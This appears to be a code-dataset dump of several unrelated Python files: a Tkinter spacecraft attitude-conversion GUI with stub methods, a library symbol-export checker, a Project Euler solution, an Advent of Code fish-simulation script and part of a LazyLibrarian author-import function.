self.att1SunRollLabel.grid(row=1, column=0, padx=5)\n\n self.att1SunPitchLabel = ttk.Label(self.att1SunAngFrame, text=\"Sun Pitch\")\n self.att1SunPitchLabel.grid(row=2, column=0, padx=5)\n\n self.att1SunYawLabel = ttk.Label(self.att1SunAngFrame, text=\"Sun Yaw\")\n self.att1SunYawLabel.grid(row=3, column=0, padx=5)\n\n self.att1SunRollEntry = ttk.Entry(self.att1SunAngFrame, width=10, textvariable=att1SunRoll)\n self.att1SunRollEntry.grid(row=1, column=1)\n\n self.att1SunPitchEntry = ttk.Entry(self.att1SunAngFrame, width=10, textvariable=att1SunPitch)\n self.att1SunPitchEntry.grid(row=2, column=1)\n\n self.att1SunYawEntry = ttk.Entry(self.att1SunAngFrame, width=10, textvariable=att1SunYaw)\n self.att1SunYawEntry.grid(row=3, column=1)\n self.att1SunYawEntry.delete(0,END)\n self.att1SunYawEntry.config(state='disable')\n\n # Attitude 2 Section--------------------------------------------------------------------------------------------\n\n # Attitude 2 Top Level Layout--------------------------------------\n\n # Attitude 2 Title\n self.att2Label = ttk.Label(self.att2Frame, text=\"Attitude 2\")\n self.att2Label.grid(row=0, column=0, columnspan=6, padx=0, pady=2)\n\n # Attitude 2 Celestial Frame\n self.att2CelestFrame = ttk.Frame(self.att2Frame, relief='groove')\n self.att2CelestFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.att2Frame.columnconfigure(0, weight=4)\n\n # Attitude 2 Button 1 Frame\n self.att2But1Frame = ttk.Frame(self.att2Frame)\n self.att2But1Frame.grid(row=1, column=1, ipady=2)\n self.att2Frame.columnconfigure(1, weight=1)\n\n # Attitude 2 Quaternion Frame\n self.att2QuatFrame = ttk.Frame(self.att2Frame, relief='groove')\n self.att2QuatFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.att2Frame.columnconfigure(2, weight=4)\n\n # Attitude 2 Button 2 Frame\n self.att2But2Frame = ttk.Frame(self.att2Frame)\n self.att2But2Frame.grid(row=1, column=3, ipady=2)\n self.att2Frame.columnconfigure(3, weight=1)\n\n # Attitude 2 Celestial Frame\n self.att2SunAngFrame = ttk.Frame(self.att2Frame, relief='groove')\n self.att2SunAngFrame.grid(row=1, column=4, ipadx=10, ipady=2)\n self.att2Frame.columnconfigure(4, weight=2)\n\n # Clear att2\n self.att2ClearButton = ttk.Button(self.att2Frame, text=\"Clear\", width=5, command=self.att2Clear)\n self.att2ClearButton.grid(row=1, column=5, padx=10)\n self.att2Frame.columnconfigure(5, weight=4)\n\n # Attitude 2 Celestial Frame - Details----------------------------\n\n self.att2CelestLabel = ttk.Label(self.att2CelestFrame, text=\"Celestial\")\n self.att2CelestLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att2RALabel = ttk.Label(self.att2CelestFrame, text=\"RA\")\n self.att2RALabel.grid(row=1, column=0, padx=5)\n\n self.att2DecLabel = ttk.Label(self.att2CelestFrame, text=\"Dec\")\n self.att2DecLabel.grid(row=2, column=0, padx=5)\n\n self.att2PALabel = ttk.Label(self.att2CelestFrame, text=\"PA\")\n self.att2PALabel.grid(row=3, column=0, padx=5)\n\n self.att2RAEntry = ttk.Entry(self.att2CelestFrame, width=10, textvariable=att2RA)\n self.att2RAEntry.grid(row=1, column=1)\n\n self.att2DecEntry = ttk.Entry(self.att2CelestFrame, width=10, textvariable=att2Dec)\n self.att2DecEntry.grid(row=2, column=1)\n\n self.att2PAEntry = ttk.Entry(self.att2CelestFrame, width=10, textvariable=att2PA)\n self.att2PAEntry.grid(row=3, column=1)\n\n # Attitude 2 Button 1 Frame - Details-----------------------------\n\n # Button to Convert Celestial to Quaternion\n self.att2CelestToQuatButton = ttk.Button(self.att2But1Frame, text=\"▶\", width=2, command=self.att2CelestToQuat)\n self.att2CelestToQuatButton.grid(row=1, column=1)\n\n # Button to Convert Quaternion to Celestial\n self.att2QuatToCelestButton = ttk.Button(self.att2But1Frame, text=\"◀\", width=2, command=self.att2QuatToCelest)\n self.att2QuatToCelestButton.grid(row=2, column=1)\n\n # Attitude 2 Quaternion Frame - Details----------------------------\n\n self.att2QuatLabel = ttk.Label(self.att2QuatFrame, text=\"Quaternion\")\n self.att2QuatLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att2Quat1Label = ttk.Label(self.att2QuatFrame, text=\"q1\")\n self.att2Quat1Label.grid(row=1, column=0, padx=5)\n\n self.att2Quat2Label = ttk.Label(self.att2QuatFrame, text=\"q2\")\n self.att2Quat2Label.grid(row=2, column=0, padx=5)\n\n self.att2Quat3Label = ttk.Label(self.att2QuatFrame, text=\"q3\")\n self.att2Quat3Label.grid(row=3, column=0, padx=5)\n\n self.att2Quat4Label = ttk.Label(self.att2QuatFrame, text=\"q4\")\n self.att2Quat4Label.grid(row=4, column=0, padx=5)\n\n self.att2Quat1Entry = ttk.Entry(self.att2QuatFrame, width=10, textvariable=att2Quat1)\n self.att2Quat1Entry.grid(row=1, column=1)\n\n self.att2Quat2Entry = ttk.Entry(self.att2QuatFrame, width=10, textvariable=att2Quat2)\n self.att2Quat2Entry.grid(row=2, column=1)\n\n self.att2Quat3Entry = ttk.Entry(self.att2QuatFrame, width=10, textvariable=att2Quat3)\n self.att2Quat3Entry.grid(row=3, column=1)\n\n self.att2Quat4Entry = ttk.Entry(self.att2QuatFrame, width=10, textvariable=att2Quat4)\n self.att2Quat4Entry.grid(row=4, column=1)\n\n # Attitude 2 Button 2 Frame - Details-----------------------------\n\n # Button to Convert Quaternion to Sun Angles\n self.att2CelestToSunAngBut = ttk.Button(self.att2But2Frame, text=\"▶\", width=2, command=self.att2QuatToSunAng)\n self.att2CelestToSunAngBut.grid(row=1, column=1)\n\n # Button to Convert Sun Angles to Quaternion\n self.att2CelestToSunAngBut = ttk.Button(self.att2But2Frame, text=\"◀\", width=2, command=self.att2SunAngToQuat)\n self.att2CelestToSunAngBut.grid(row=2, column=1)\n\n # Attitude 2 Sun Angles Frame - Details---------------------------\n\n self.att2SunAngLabel = ttk.Label(self.att2SunAngFrame, text=\"Sun Angles\")\n self.att2SunAngLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.att2SunRollLabel = ttk.Label(self.att2SunAngFrame, text=\"Sun Roll\")\n self.att2SunRollLabel.grid(row=1, column=0, padx=5)\n\n self.att2SunPitchLabel = ttk.Label(self.att2SunAngFrame, text=\"Sun Pitch\")\n self.att2SunPitchLabel.grid(row=2, column=0, padx=5)\n\n self.att2SunYawLabel = ttk.Label(self.att2SunAngFrame, text=\"Sun Yaw\")\n self.att2SunYawLabel.grid(row=3, column=0, padx=5)\n\n self.att2SunRollEntry = ttk.Entry(self.att2SunAngFrame, width=10, textvariable=att2SunRoll)\n self.att2SunRollEntry.grid(row=1, column=1)\n\n self.att2SunPitchEntry = ttk.Entry(self.att2SunAngFrame, width=10, textvariable=att2SunPitch)\n self.att2SunPitchEntry.grid(row=2, column=1)\n\n self.att2SunYawEntry = ttk.Entry(self.att2SunAngFrame, width=10, textvariable=att2SunYaw)\n self.att2SunYawEntry.grid(row=3, column=1)\n self.att2SunYawEntry.delete(0,END)\n self.att2SunYawEntry.config(state='disable')\n\n # Slew Section--------------------------------------------------------------------------------------------------\n\n # Slew Top Level Layout--------------------------------------------\n\n # Slew Title\n self.slewLabel = ttk.Label(self.slewFrame, text=\"Slew\")\n self.slewLabel.grid(row=0, column=0, columnspan=5, padx=0, pady=2)\n\n # Slew Momentum Frame\n self.slewMomFrame = ttk.Frame(self.slewFrame, relief='groove')\n self.slewMomFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.slewFrame.columnconfigure(0, weight=4)\n\n # Calculate Slew\n self.slewButton = ttk.Button(self.slewFrame, text=\"▶\", width=2, command=self.slew)\n self.slewButton.grid(row=1, column=1)\n self.slewFrame.columnconfigure(1, weight=1)\n\n # Slew Duration Frame\n self.slewDurFrame = ttk.Frame(self.slewFrame, relief='groove')\n self.slewDurFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.slewFrame.columnconfigure(2, weight=4)\n\n # Slew Angles Frame\n self.slewAngFrame = ttk.Frame(self.slewFrame, relief='groove')\n self.slewAngFrame.grid(row=1, column=3, ipadx=10, ipady=2)\n self.slewFrame.columnconfigure(3, weight=2)\n\n # Clear slew\n self.slewClearButton = ttk.Button(self.slewFrame, text=\"Clear\", width=5, command=self.slewClear)\n self.slewClearButton.grid(row=1, column=4, padx=10)\n self.slewFrame.columnconfigure(4, weight=4)\n\n # Slew Momentum Frame - Details-----------------------------------\n\n self.slewMomLabel = ttk.Label(self.slewMomFrame, text=\"Total System Momentum\")\n self.slewMomLabel.grid(row=0, column=0, columnspan=2, padx=5, pady=2)\n\n self.slewMomUnitLabel = ttk.Label(self.slewMomFrame, text=\"(N-m-s)\")\n self.slewMomUnitLabel.grid(row=1, column=0, padx=5)\n\n self.slewMomEntry = ttk.Entry(self.slewMomFrame, width=10, textvariable=slewMom)\n self.slewMomEntry.grid(row=1, column=1)\n\n # Slew Duration Frame - Details-----------------------------------\n\n self.slewDurLabel = ttk.Label(self.slewDurFrame, text=\"Duration\")\n self.slewDurLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.slewDurUnitLabel = ttk.Label(self.slewDurFrame, text=\"(min)\")\n self.slewDurUnitLabel.grid(row=1, column=0, padx=5)\n\n self.slewDurEntry = ttk.Entry(self.slewDurFrame, width=10, textvariable=slewDur)\n self.slewDurEntry.grid(row=1, column=1)\n self.slewDurEntry.delete(0,END)\n self.slewDurEntry.config(state='readonly')\n\n # Slew Angles Frame - Details-------------------------------------\n\n self.slewAngLabel = ttk.Label(self.slewAngFrame, text=\"Sun Angles\")\n self.slewAngLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.slewAngRollLabel = ttk.Label(self.slewAngFrame, text=\"Roll\")\n self.slewAngRollLabel.grid(row=1, column=0, padx=5)\n\n self.slewAngPitchLabel = ttk.Label(self.slewAngFrame, text=\"Pitch\")\n self.slewAngPitchLabel.grid(row=2, column=0, padx=5)\n\n self.slewAngYawLabel = ttk.Label(self.slewAngFrame, text=\"Yaw\")\n self.slewAngYawLabel.grid(row=3, column=0, padx=5)\n\n self.slewAngRollEntry = ttk.Entry(self.slewAngFrame, width=10, textvariable=slewAngRoll)\n self.slewAngRollEntry.grid(row=1, column=1)\n self.slewAngRollEntry.delete(0,END)\n self.slewAngRollEntry.config(state='readonly')\n\n self.slewAngPitchEntry = ttk.Entry(self.slewAngFrame, width=10, textvariable=slewAngPitch)\n self.slewAngPitchEntry.grid(row=2, column=1)\n self.slewAngPitchEntry.delete(0,END)\n self.slewAngPitchEntry.config(state='readonly')\n\n self.slewAngYawEntry = ttk.Entry(self.slewAngFrame, width=10, textvariable=slewAngYaw)\n self.slewAngYawEntry.grid(row=3, column=1)\n self.slewAngYawEntry.delete(0,END)\n self.slewAngYawEntry.config(state='readonly')\n\n # Vectors Section-----------------------------------------------------------------------------------------------\n\n # Vectors Top Level Layout--------------------------------------------\n\n # Vectors Title\n self.vectorsLabel = ttk.Label(self.vectorsFrame, text=\"Vectors\")\n self.vectorsLabel.grid(row=0, column=0, columnspan=5, padx=0, pady=2)\n\n # Vectors ECI Frame\n self.vectorsEciFrame = ttk.Frame(self.vectorsFrame, relief='groove')\n self.vectorsEciFrame.grid(row=1, column=0, ipadx=10, ipady=2)\n self.vectorsFrame.columnconfigure(0, weight=4)\n\n # Vectors Button 1 Frame\n self.vectorsBut1Frame = ttk.Frame(self.vectorsFrame)\n self.vectorsBut1Frame.grid(row=1, column=1, ipady=2)\n self.vectorsFrame.columnconfigure(1, weight=1)\n\n # Vectors J Frame\n self.vectorsJFrame = ttk.Frame(self.vectorsFrame, relief='groove')\n self.vectorsJFrame.grid(row=1, column=2, ipadx=10, ipady=2)\n self.vectorsFrame.columnconfigure(2, weight=4)\n\n # Clear vectors\n self.vectorsClearButton = ttk.Button(self.vectorsFrame, text=\"Clear\", width=5, command=self.vectorsClear)\n self.vectorsClearButton.grid(row=1, column=3, padx=10)\n self.vectorsFrame.columnconfigure(3, weight=4)\n\n # Vectors ECI Vector Frame - Details------------------------------\n self.vectorsEciLabel = ttk.Label(self.vectorsEciFrame, text=\"ECI\")\n self.vectorsEciLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.vectorsEciXLabel = ttk.Label(self.vectorsEciFrame, text=\"x\")\n self.vectorsEciXLabel.grid(row=1, column=0, padx=5)\n\n self.vectorsEciYLabel = ttk.Label(self.vectorsEciFrame, text=\"y\")\n self.vectorsEciYLabel.grid(row=2, column=0, padx=5)\n\n self.vectorsEciZLabel = ttk.Label(self.vectorsEciFrame, text=\"z\")\n self.vectorsEciZLabel.grid(row=3, column=0, padx=5)\n\n self.vectorsEciXEntry = ttk.Entry(self.vectorsEciFrame, width=10, textvariable=vectorsEciX)\n self.vectorsEciXEntry.grid(row=1, column=1)\n\n self.vectorsEciYEntry = ttk.Entry(self.vectorsEciFrame, width=10, textvariable=vectorsEciY)\n self.vectorsEciYEntry.grid(row=2, column=1)\n\n self.vectorsEciZEntry = ttk.Entry(self.vectorsEciFrame, width=10, textvariable=vectorsEciZ)\n self.vectorsEciZEntry.grid(row=3, column=1)\n\n # Vectors Button 1 Frame - Details--------------------------------\n\n # Button to Convert ECI Frame to J Frame\n self.vectorsEciToJButton = ttk.Button(self.vectorsBut1Frame, text=\"▶\", width=2, command=self.vectorsEciToJ)\n self.vectorsEciToJButton.grid(row=1, column=1)\n\n # Button to Convert J Frame to ECI Frame\n self.vectorsJToEciButton = ttk.Button(self.vectorsBut1Frame, text=\"◀\", width=2, command=self.vectorsJToEci)\n self.vectorsJToEciButton.grid(row=2, column=1)\n\n # Vectors J Vector Frame - Details------------------------------\n self.vectorsJLabel = ttk.Label(self.vectorsJFrame, text=\"J\")\n self.vectorsJLabel.grid(row=0, column=0, columnspan=2, pady=2)\n\n self.vectorsJ1Label = ttk.Label(self.vectorsJFrame, text=\"J1\")\n self.vectorsJ1Label.grid(row=1, column=0, padx=5)\n\n self.vectorsJ2Label = ttk.Label(self.vectorsJFrame, text=\"J2\")\n self.vectorsJ2Label.grid(row=2, column=0, padx=5)\n\n self.vectorsJ3Label = ttk.Label(self.vectorsJFrame, text=\"J3\")\n self.vectorsJ3Label.grid(row=3, column=0, padx=5)\n\n self.vectorsJ1Entry = ttk.Entry(self.vectorsJFrame, width=10, textvariable=vectorsJ1)\n self.vectorsJ1Entry.grid(row=1, column=1)\n\n self.vectorsJ2Entry = ttk.Entry(self.vectorsJFrame, width=10, textvariable=vectorsJ2)\n self.vectorsJ2Entry.grid(row=2, column=1)\n\n self.vectorsJ3Entry = ttk.Entry(self.vectorsJFrame, width=10, textvariable=vectorsJ3)\n self.vectorsJ3Entry.grid(row=3, column=1)\n\n # End Layout----------------------------------------------------------------------------------------------------\n\n def ephPosToVec(self):\n\n # clear sunVec\n self.ephSunVecXEntry.delete(0,END)\n self.ephSunVecYEntry.delete(0,END)\n self.ephSunVecZEntry.delete(0,END)\n\n # sun vector = sun position - JWST position\n self.ephSunVecXEntry.insert(0,ephSunPosX.get()-ephJwstPosX.get())\n self.ephSunVecYEntry.insert(0,ephSunPosY.get()-ephJwstPosY.get())\n self.ephSunVecZEntry.insert(0,ephSunPosZ.get()-ephJwstPosZ.get())\n\n # disable sun position\n self.ephSunPosXEntry.config(state='readonly')\n self.ephSunPosYEntry.config(state='readonly')\n self.ephSunPosZEntry.config(state='readonly')\n\n # disable JWST position\n self.ephJwstPosXEntry.config(state='readonly')\n self.ephJwstPosYEntry.config(state='readonly')\n self.ephJwstPosZEntry.config(state='readonly')\n\n # disable sun vector\n self.ephSunVecXEntry.config(state='readonly')\n self.ephSunVecYEntry.config(state='readonly')\n self.ephSunVecZEntry.config(state='readonly')\n\n def ephVecToNormVec(self):\n\n # clear sunVec\n self.ephSunVecNormXEntry.delete(0,END)\n self.ephSunVecNormYEntry.delete(0,END)\n self.ephSunVecNormZEntry.delete(0,END)\n\n # normalize sun vector\n ephSunVec = np.array([ephSunVecX.get(), ephSunVecY.get(), ephSunVecZ.get()])\n ephSunVecNorm = ephSunVec / np.linalg.norm(ephSunVec)\n self.ephSunVecNormXEntry.insert(0,ephSunVecNorm[0])\n self.ephSunVecNormYEntry.insert(0,ephSunVecNorm[1])\n self.ephSunVecNormZEntry.insert(0,ephSunVecNorm[2])\n\n # disable sun vector\n self.ephSunVecXEntry.config(state='readonly')\n self.ephSunVecYEntry.config(state='readonly')\n self.ephSunVecZEntry.config(state='readonly')\n\n # disable normalized sun vector\n self.ephSunVecNormXEntry.config(state='readonly')\n self.ephSunVecNormYEntry.config(state='readonly')\n self.ephSunVecNormZEntry.config(state='readonly')\n\n def ephClear(self):\n\n # re-enable all ephemeris values\n self.ephJwstPosXEntry.config(state='Normal')\n self.ephJwstPosYEntry.config(state='Normal')\n self.ephJwstPosZEntry.config(state='Normal')\n self.ephSunPosXEntry.config(state='Normal')\n self.ephSunPosYEntry.config(state='Normal')\n self.ephSunPosZEntry.config(state='Normal')\n self.ephSunVecXEntry.config(state='Normal')\n self.ephSunVecYEntry.config(state='Normal')\n self.ephSunVecZEntry.config(state='Normal')\n self.ephSunVecNormXEntry.config(state='Normal')\n self.ephSunVecNormYEntry.config(state='Normal')\n self.ephSunVecNormZEntry.config(state='Normal')\n\n # clear all ephemeris values\n self.ephJwstPosXEntry.delete(0,END)\n self.ephJwstPosYEntry.delete(0,END)\n self.ephJwstPosZEntry.delete(0,END)\n self.ephSunPosXEntry.delete(0,END)\n self.ephSunPosYEntry.delete(0,END)\n self.ephSunPosZEntry.delete(0,END)\n self.ephSunVecXEntry.delete(0,END)\n self.ephSunVecYEntry.delete(0,END)\n self.ephSunVecZEntry.delete(0,END)\n self.ephSunVecNormXEntry.delete(0,END)\n self.ephSunVecNormYEntry.delete(0,END)\n self.ephSunVecNormZEntry.delete(0,END)\n\n # Set the focus to the first ephemeris value\n self.ephSunPosXEntry.focus_set()\n\n def att1CelestToQuat(self):\n print('hi')\n\n def att1QuatToCelest(self):\n print('hi')\n\n def att1QuatToSunAng(self):\n print('hi')\n\n def att1SunAngToQuat(self):\n print('hi')\n\n def att1Clear(self):\n\n # re-enable all Attitude 1 values\n self.att1RAEntry.config(state='Normal')\n self.att1DecEntry.config(state='Normal')\n self.att1PAEntry.config(state='Normal')\n self.att1Quat1Entry.config(state='Normal')\n self.att1Quat2Entry.config(state='Normal')\n self.att1Quat3Entry.config(state='Normal')\n self.att1Quat4Entry.config(state='Normal')\n self.att1SunRollEntry.config(state='Normal')\n self.att1SunPitchEntry.config(state='Normal')\n self.att1SunYawEntry.config(state='Normal')\n\n # clear all Attitude 1 values\n self.att1RAEntry.delete(0, END)\n self.att1DecEntry.delete(0, END)\n self.att1PAEntry.delete(0, END)\n self.att1Quat1Entry.delete(0, END)\n self.att1Quat2Entry.delete(0, END)\n self.att1Quat3Entry.delete(0, END)\n self.att1Quat4Entry.delete(0, END)\n self.att1SunRollEntry.delete(0, END)\n self.att1SunPitchEntry.delete(0, END)\n self.att1SunYawEntry.delete(0, END)\n\n # Set the focus to the first Attitude 1 value\n self.att1RAEntry.focus_set()\n\n def att2CelestToQuat(self):\n print('hi')\n\n def att2QuatToCelest(self):\n print('hi')\n\n def att2QuatToSunAng(self):\n print('hi')\n\n def att2SunAngToQuat(self):\n print('hi')\n\n def att2Clear(self):\n\n # re-enable all Attitude 1 values\n self.att2RAEntry.config(state='Normal')\n self.att2DecEntry.config(state='Normal')\n self.att2PAEntry.config(state='Normal')\n self.att2Quat1Entry.config(state='Normal')\n self.att2Quat2Entry.config(state='Normal')\n self.att2Quat3Entry.config(state='Normal')\n self.att2Quat4Entry.config(state='Normal')\n self.att2SunRollEntry.config(state='Normal')\n self.att2SunPitchEntry.config(state='Normal')\n self.att2SunYawEntry.config(state='Normal')\n\n # clear all Attitude 1 values\n self.att2RAEntry.delete(0, END)\n self.att2DecEntry.delete(0, END)\n self.att2PAEntry.delete(0, END)\n self.att2Quat1Entry.delete(0, END)\n self.att2Quat2Entry.delete(0, END)\n self.att2Quat3Entry.delete(0, END)\n self.att2Quat4Entry.delete(0, END)\n self.att2SunRollEntry.delete(0, END)\n self.att2SunPitchEntry.delete(0, END)\n self.att2SunYawEntry.delete(0, END)\n\n # Set the focus to the first Attitude 1 value\n self.att2RAEntry.focus_set()\n\n def slew(self):\n print('hi')\n\n def slewClear(self):\n\n # Re-enable all Slew values\n self.slewMomEntry.config(state='Normal')\n self.slewDurEntry.config(state='Normal')\n self.slewAngRollEntry.config(state='Normal')\n self.slewAngPitchEntry.config(state='Normal')\n self.slewAngYawEntry.config(state='Normal')\n\n # Clear all Slew values\n self.slewMomEntry.delete(0, END)\n self.slewDurEntry.delete(0, END)\n self.slewAngRollEntry.delete(0, END)\n self.slewAngPitchEntry.delete(0, END)\n self.slewAngYawEntry.delete(0, END)\n\n # Set the focus to the first Attitude 1 value\n self.slewMomEntry.focus_set()\n\n # Set outputs to read-only\n self.slewDurEntry.config(state='readonly')\n self.slewAngRollEntry.config(state='readonly')\n self.slewAngPitchEntry.config(state='readonly')\n self.slewAngYawEntry.config(state='readonly')\n\n def vectorsEciToJ(self):\n print('hi')\n\n def vectorsJToEci(self):\n print('hi')\n\n def vectorsClear(self):\n\n # Re-enable all Vector values\n self.vectorsEciXEntry.config(state='Normal')\n self.vectorsEciYEntry.config(state='Normal')\n self.vectorsEciZEntry.config(state='Normal')\n self.vectorsJ1Entry.config(state='Normal')\n self.vectorsJ2Entry.config(state='Normal')\n self.vectorsJ3Entry.config(state='Normal')\n\n # Clear all Slew values\n self.vectorsEciXEntry.delete(0, END)\n self.vectorsEciYEntry.delete(0, END)\n self.vectorsEciZEntry.delete(0, END)\n self.vectorsJ1Entry.delete(0, END)\n self.vectorsJ2Entry.delete(0, END)\n self.vectorsJ3Entry.delete(0, END)\n\n # Set the focus to the first Vectors value\n self.vectorsEciXEntry.focus_set()\n\nroot = Tk()\nroot.title('ACS Conversion Tool')\n\napp = AcsGui(root)\n\nroot.mainloop()\n","repo_name":"aarvai/sandbox","sub_path":"acs_gui.py","file_name":"acs_gui.py","file_ext":"py","file_size_in_byte":38939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32443841153","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport platform\nimport subprocess\n\n# This list contains symbols that _might_ be exported for some platforms\nPLATFORM_SYMBOLS = [\n '__bss_end__',\n '__bss_start__',\n '__bss_start',\n '__end__',\n '_bss_end__',\n '_edata',\n '_end',\n '_fini',\n '_init',\n]\n\n\ndef get_symbols(nm, lib):\n '''\n List all the (non platform-specific) symbols exported by the library\n '''\n symbols = []\n platform_name = platform.system()\n output = subprocess.check_output([nm, '-gP', lib],\n stderr=open(os.devnull, 'w')).decode(\"ascii\")\n for line in output.splitlines():\n fields = line.split()\n if len(fields) == 2 or fields[1] == 'U':\n continue\n symbol_name = fields[0]\n if platform_name == 'Linux':\n if symbol_name in PLATFORM_SYMBOLS:\n continue\n elif platform_name == 'Darwin':\n assert symbol_name[0] == '_'\n symbol_name = symbol_name[1:]\n symbols.append(symbol_name)\n\n return symbols\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--symbols-file',\n action='store',\n required=True,\n help='path to file containing symbols')\n parser.add_argument('--lib',\n action='store',\n required=True,\n help='path to library')\n parser.add_argument('--nm',\n action='store',\n required=True,\n help='path to binary (or name in $PATH)')\n args = parser.parse_args()\n\n try:\n lib_symbols = get_symbols(args.nm, args.lib)\n except:\n # We can't run this test, but we haven't technically failed it either\n # Return the GNU \"skip\" error code\n exit(77)\n mandatory_symbols = []\n optional_symbols = []\n with open(args.symbols_file) as symbols_file:\n qualifier_optional = '(optional)'\n for line in symbols_file.readlines():\n\n # Strip comments\n line = line.split('#')[0]\n line = line.strip()\n if not line:\n continue\n\n # Line format:\n # [qualifier] symbol\n qualifier = None\n symbol = None\n\n fields = line.split()\n if len(fields) == 1:\n symbol = fields[0]\n elif len(fields) == 2:\n qualifier = fields[0]\n symbol = fields[1]\n else:\n print(args.symbols_file + ': invalid format: ' + line)\n exit(1)\n\n # The only supported qualifier is 'optional', which means the\n # symbol doesn't have to be exported by the library\n if qualifier and not qualifier == qualifier_optional:\n print(args.symbols_file + ': invalid qualifier: ' + qualifier)\n exit(1)\n\n if qualifier == qualifier_optional:\n optional_symbols.append(symbol)\n else:\n mandatory_symbols.append(symbol)\n\n unknown_symbols = []\n for symbol in lib_symbols:\n if symbol in mandatory_symbols:\n continue\n if symbol in optional_symbols:\n continue\n unknown_symbols.append(symbol)\n\n missing_symbols = [\n sym for sym in mandatory_symbols if sym not in lib_symbols\n ]\n\n for symbol in unknown_symbols:\n print(args.lib + ': unknown symbol exported: ' + symbol)\n\n for symbol in missing_symbols:\n print(args.lib + ': missing symbol: ' + symbol)\n\n if unknown_symbols or missing_symbols:\n exit(1)\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"iridium-browser/iridium-browser","sub_path":"third_party/libdrm/src/symbols-check.py","file_name":"symbols-check.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":314,"dataset":"github-code","pt":"53"} +{"seq_id":"13852731936","text":"MOD = 10 ** 9 + 7\n\ndef solve(n, k, b):\n mb = k * (b - 1)\n knapsack = [[0] * (mb + 1) for _ in range(k + 1)]\n knapsack[0][0] = 1\n for i in range(k):\n for j, w in enumerate(knapsack[i]):\n if w > 0:\n for d in range(b):\n knapsack[i + 1][j + d] += w\n knapsack[i + 1][j + d] %= MOD\n mk = k * b\n up = min(mk, n // (b ** k))\n ways = [[0] * (up + 1)]\n ways[0][up] = 1\n for i in range(k, -1, -1):\n rem = 0\n if i > 0:\n rem = n // (b ** (i - 1)) % b\n new_ways = [[0] * (mk + 1) for _ in range(k - i + 2)]\n for free in range(k - i + 1):\n for left, w in enumerate(ways[free]):\n if w == 0:\n continue\n for use in range(left + 1):\n if i > 0 and use > 0 and use - 1 <= mb:\n new_ways[free][min((left - use) * b + rem, mk)] += w * knapsack[free][use - 1]\n new_ways[free][min((left - use) * b + rem, mk)] %= MOD\n if use <= mb:\n new_ways[free + 1][min((left - use) * b + rem, mk)] += w * knapsack[free][use]\n new_ways[free + 1][min((left - use) * b + rem, mk)] %= MOD\n ways = new_ways\n return sum(map(sum, ways)) % MOD\n\nprint(solve(14, 3, 2))\nprint(solve(200, 5, 3))\nprint(solve(1000, 10, 5))\nresult = 0\nfor k in range(10, 16):\n result += solve(10 ** k, k, k)\nprint(result % MOD)\n","repo_name":"ftiasch/acm-icpc","sub_path":"project-euler/p528.py","file_name":"p528.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"53"} +{"seq_id":"33754293485","text":"import numpy as np\n\ninput_file = \"input.txt\"\nraw_input = np.loadtxt(input_file, delimiter=\",\", dtype=int)\n\n\ndef a_day_in_the_sea(swarm):\n # part 1 func, gets the input as it sees, can't scale\n swarm -= 1\n birth_flag = swarm == -1\n swarm[birth_flag] = 6\n birth_count = np.sum(birth_flag, dtype=int)\n return np.concatenate([swarm, np.ones(birth_count, dtype=int) * 8])\n\n\ndef a_day_in_the_sea_but_smarter(swarm):\n birth_count = swarm[0]\n swarm = np.append(swarm[1:], 0)\n swarm[6] += birth_count\n swarm[8] += birth_count\n return swarm\n\nbin_count = np.bincount(raw_input.astype(int))\nswarm = np.pad(bin_count, (0, 9 - bin_count.shape[0]))\n\ndays = 80\nfor day in range(1, days + 1):\n swarm = a_day_in_the_sea_but_smarter(swarm)\n\nprint(f\"After {days} days fish count: {np.sum(swarm)}\")\n","repo_name":"octaskin/aoc21","sub_path":"day06/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10858770011","text":"import time, os, threading\n\nimport lazylibrarian\nfrom lazylibrarian import logger, formatter, database\nfrom lazylibrarian.gr import GoodReads\nfrom lazylibrarian.gb import GoogleBooks\n\n\ndef addAuthorToDB(authorname=None, refresh=False):\n threading.currentThread().name = \"DBIMPORT\"\n type = 'author'\n myDB = database.DBConnection()\n\n GR = GoodReads(authorname)\n \n query = \"SELECT * from authors WHERE AuthorName='%s'\" % authorname.replace(\"'\",\"''\")\n dbauthor = myDB.action(query).fetchone()\n controlValueDict = {\"AuthorName\": authorname}\n\n if dbauthor is None:\n newValueDict = {\n \"AuthorID\": \"0: %s\" % (authorname),\n \"Status\": \"Loading\"\n }\n logger.info(\"Now adding new author: %s to database\" % authorname)\n else:\n newValueDict = {\"Status\": \"Loading\"}\n logger.info(\"Now updating author: %s\" % authorname)\n myDB.upsert(\"authors\", newValueDict, controlValueDict)\n\n author = GR.find_author_id()\n if author:\n authorid = author['authorid']\n authorlink = author['authorlink']\n authorimg = author['authorimg']\n controlValueDict = {\"AuthorName\": authorname}\n newValueDict = {\n \"AuthorID\": authorid,\n \"AuthorLink\": authorlink,\n \"AuthorImg\": authorimg,\n \"AuthorBorn\": author['authorborn'],\n \"AuthorDeath\": author['authordeath'],\n \"DateAdded\": formatter.today(),\n \"Status\": \"Loading\"\n }\n myDB.upsert(\"authors\", newValueDict, controlValueDict)\n else:\n logger.error(\"Nothing found\")\n\n# process books\n if lazylibrarian.BOOK_API == \"GoogleBooks\":\n book_api = GoogleBooks()\n book_api.get_author_books(authorid, authorname, refresh=refresh)\n elif lazylibrarian.BOOK_API == \"GoodReads\":\n GR.get_author_books(authorid, authorname, refresh=refresh)\n\n logger.info(\"[%s] Author update complete\" % 